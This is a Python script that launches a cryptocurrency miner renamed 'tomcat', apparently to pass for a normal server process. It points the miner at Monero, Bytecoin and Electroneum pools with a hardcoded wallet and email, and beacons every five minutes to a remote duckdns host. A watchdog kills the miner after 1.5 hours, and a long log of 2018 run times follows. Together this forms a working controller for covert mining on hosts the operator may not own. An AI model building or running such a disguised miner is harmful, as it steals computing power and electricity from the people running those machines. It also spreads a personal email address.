import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:01.915542
#2018-02-17 16:20:03.845327
#2018-02-17 18:07:06.335791
#2018-02-17 19:55:05.245764
#2018-02-17 21:42:06.289869
#2018-02-17 23:26:07.764601
#2018-02-18 01:16:03.849120
#2018-02-18 03:03:07.284179
#2018-02-18 04:52:01.383770
#2018-02-18 06:44:07.380722
#2018-02-18 08:34:03.779041
#2018-02-18 10:21:03.666522
#2018-02-18 12:07:05.710644
#2018-02-18 13:52:06.196271
#2018-02-18 15:42:08.139289
#2018-02-18 17:32:06.936281
#2018-02-18 19:21:05.065632
#2018-02-18 21:07:03.867185
#2018-02-18 22:54:01.376468
#2018-02-19 00:41:01.663107
#2018-02-19 02:27:04.758393
#2018-02-19 04:14:04.419237
#2018-02-19 05:58:04.052461
#2018-02-19 07:46:05.561874
#2018-02-19 09:36:07.503832
#2018-02-19 11:25:09.541524
#2018-02-19 13:12:06.359837
#2018-02-19 15:01:05.917245
#2018-02-19 16:49:04.423793
#2018-02-19 18:37:04.108823
#2018-02-19 20:24:07.657852
#2018-02-19 22:13:07.712802
#2018-02-20 00:01:01.538399
#2018-02-20 01:49:09.416692
#2018-02-20 03:39:04.638371
#2018-02-20 05:25:04.323082
#2018-02-20 07:09:08.106254
#2018-02-20 08:56:04.187011
#2018-02-20 10:40:09.138749
#2018-02-20 12:26:04.713938
#2018-02-20 14:12:09.632644
#2018-02-20 15:56:04.434833
#2018-02-20 17:42:06.822365
#2018-02-20 19:32:06.007073
#2018-02-20 21:19:01.625635
#2018-02-20 23:03:08.141101
#2018-02-21 00:48:06.850112
#2018-02-21 02:32:07.313764
#2018-02-21 04:19:05.422776
#2018-02-21 06:07:01.668556
#2018-02-21 07:53:07.173206
#2018-02-21 09:40:10.389741
#2018-02-21 11:28:02.039163
#2018-02-21 13:16:10.107620
#2018-02-21 15:02:09.325172
#2018-02-21 16:51:08.797794
#2018-02-21 18:40:09.194825
#2018-02-21 20:25:09.868927
#2018-02-21 22:14:01.984744
#2018-02-22 00:03:06.898830
#2018-02-22 01:51:06.665256
#2018-02-22 03:39:06.776650
#2018-02-22 05:26:03.255082
#2018-02-22 07:11:06.172944
#2018-02-22 08:57:05.896783
#2018-02-22 10:45:10.481960
#2018-02-22 12:31:08.774596
#2018-02-22 14:17:08.153912
#2018-02-22 16:05:01.541428
#2018-02-22 17:50:15.162246
#2018-02-22 19:36:05.899949
#2018-02-22 21:28:07.943657
#2018-02-22 23:14:05.895687
#2018-02-23 01:01:05.077961
#2018-02-23 02:49:01.820747
#2018-02-23 04:37:06.708452
#2018-02-23 06:23:06.827459
#2018-02-23 08:09:04.395138
#2018-02-23 10:27:06.511906
#2018-02-23 12:20:08.472081
#2018-02-23 14:10:10.774556
#2018-02-23 15:59:03.939561
#2018-02-23 17:44:01.511457
#2018-02-23 19:31:07.657663
#2018-02-23 21:14:04.305678
#2018-02-23 23:03:02.208740
#2018-02-24 00:52:04.620612
#2018-02-24 02:48:05.056038
#2018-02-24 04:39:03.920902
#2018-02-24 06:23:01.924449
#2018-02-24 08:10:08.285814
#2018-02-24 09:56:04.778306
#2018-02-24 11:50:07.478165
#2018-02-24 13:41:04.157849
#2018-02-24 15:28:01.592296
#2018-02-24 17:18:01.286407
#2018-02-24 19:09:06.201207
#2018-02-24 20:57:07.037490
#2018-02-24 23:25:06.783067
#2018-02-25 03:39:03.593695
#2018-02-25 06:21:05.477580
#2018-02-25 11:34:05.399902
#2018-02-25 13:08:01.815971
#2018-02-25 14:41:01.253141
#2018-02-25 16:13:02.057620